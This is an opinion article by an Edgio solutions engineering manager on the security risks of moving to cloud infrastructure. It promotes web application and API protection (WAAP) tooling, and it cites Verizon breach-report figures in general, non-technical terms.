Following the global pandemic, enterprises have accelerated their transition to the cloud. The Infrastructure-as-a-Service (IaaS) cloud computing model facilitates remote work, speeds up digital transformation, offers scalability, boosts resilience, and can lead to cost savings. However, for businesses to effectively achieve this migration, they must understand the associated security implications and implement measures to protect their data and applications.
With the introduction of any new technology, it’s crucial that all the relevant security policies, tools, processes, and training are made clear to the organisation. A sensitive approach needs to be taken for cloud infrastructure due to the risks posed to customer-facing critical applications. The Shared Responsibility Model is a security and compliance framework that sets out the shared infrastructure and systems that a cloud provider is responsible for maintaining. It also explains how a customer is responsible for operating systems, data, and applications utilising the cloud. Companies migrating to the cloud must understand and follow these rules, otherwise data, applications, and cloud workloads may be exposed to security vulnerabilities.
Playbook for mitigating risks
Cloud exploitation involves targeting vulnerabilities in cloud infrastructure, applications, or services to gain unauthorised access, disrupt operations, steal data, or carry out other malicious activities. A cloud exploitation playbook could include attack vectors like distributed denial-of-service (DDoS) attacks, web application attacks, and bots – with the number one attack target being web applications. According to the 2023 Verizon Data Breach Investigations Report (DBIR), the majority of cyber attacks are led by organised criminals looking to disrupt business and steal data to sell. The number one reason (95%) for cyber attacks is financial gain, with 24% of all cyber attacks involving ransomware.
Results of cloud exploitation
- Unauthorised Access: Attackers may attempt to gain unauthorised access to cloud accounts, systems, or data by exploiting weak or stolen credentials, misconfigurations, or vulnerabilities in the cloud environment. Once inside, they can potentially access sensitive information, modify data, or launch further attacks.
- Data Breaches: Cloud exploitation can result in data breaches, where attackers gain access to sensitive data stored in the cloud. This can occur due to insecure configurations, inadequate access controls, or vulnerabilities in cloud storage or databases. The stolen data can be used for various malicious purposes, such as identity theft, financial fraud, or corporate espionage.
- Distributed Denial of Service (DDoS): Attackers may launch DDoS attacks against cloud services or applications, overwhelming them with a high volume of malicious traffic or requests. This can lead to service disruptions, making the cloud resources unavailable for legitimate users.
- Malware Distribution: Cloud exploitation can involve hosting or distributing malware through cloud-based platforms or services. Attackers may upload malicious files or applications to cloud storage or use cloud infrastructure to propagate malware to unsuspecting users.
- Account Hijacking: Cloud exploitation can involve the compromise of user accounts, allowing attackers to gain control over cloud resources. This can occur through techniques like phishing, social engineering, or exploiting vulnerabilities in authentication mechanisms. Once an account is hijacked, attackers can abuse the cloud resources for their own purposes or launch attacks from within the compromised account.
Measures business can adopt to minimise cloud exploitation risks
Threat detection and mitigation speed are important for three key reasons. First, adversaries are adept at learning from open-source intelligence to develop new tactics, techniques, and procedures (TTPs) making rapid security response imperative. Second, cyber criminals are well-organised and act fast. Verizon’s 2023 DBIR noted, “more than 32% of all Log4j scanning activity over the course of the year happened within 30 days of its release (with the biggest spike of activity occurring within 17 days).” And, finally, the importance of speed is clearly illustrated by the fact that companies that contain a security breach in less than 30 days can save $1M or more.
To reduce the risk of cloud exploitation, it is crucial that businesses implement strong security measures, such as robust access controls, encryption, regular security assessments, and monitoring of cloud environments. Implementing Web Application and API Protection (WAAP) at the edge is critical to identifying and mitigating a variety of threats such as DDoS attacks, API abuse, and malicious bots. Modern-day WAAPs utilise machine learning and behavioural and signature fingerprinting for early threat detection. Further, companies using AI and automation see breaches that are 74 days shorter and save $3 million more than those without.
A WAAP rapid threat detection and mitigation solution is an invaluable tool for DevSecOps teams to implement an optimised “Observe-Orient-Decide-Act” (OODA) loop to improve meantime to Detect (MTTD) and meantime to Respond (MTTR) as new threats arise.
The latest innovation is a “Dual WAAP” capability that enables DevSecOp teams to test new rules in audit mode against production traffic to verify their effectiveness while lowering the risk of blocking legitimate site traffic. This increased confidence, plus the ability to integrate with existing CI/CD workflows, allows teams to push effective virtual patches out faster, closing the door on attackers more quickly than ever before. Additionally, with Dual WAAP, there is no WAAP downtime while updating rulesets, with new rules deployed across the global network sometimes in under 60 seconds.
What does the future hold for cloud infrastructure development?
There are many advantages that cloud Infrastructure-as-a-Service brings to organisations, including agility and resilience. However, cloud exploitation continues to increase and the Shared Responsibility Model emphasises the importance of maintaining enterprise security as partners. While it is the responsibility of cloud service providers to secure the cloud infrastructure, companies can’t let their guard down against the threat of attacks on operating systems, applications, endpoints, and data.
An indispensable tool for DevSecOps teams looking to enhance their “Observe-Orient-Decide-Act” (OODA) loop is a WAAP solution. It can rapidly detect and mitigate threats by reducing both the mean time to detect (MTTD) and the mean time to respond (MTTR). As organisations build up their defence in the fight against cyber threats, WAAP solutions are a strong and effective tool.
A WAAP solution is a critical tool for DevSecOps teams aiming to improve their “Observe-Orient-Decide-Act” (OODA) loop. It can quickly identify and mitigate threats, cutting down both the mean time to detect (MTTD) and the mean time to respond (MTTR). As organisations fortify their defences against cyber threats, WAAP solutions prove to be a robust and efficient tool.
Drazen Kerzan, Senior Manager, Solutions Engineering EMEA at Edgio
The opinions expressed in this post belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.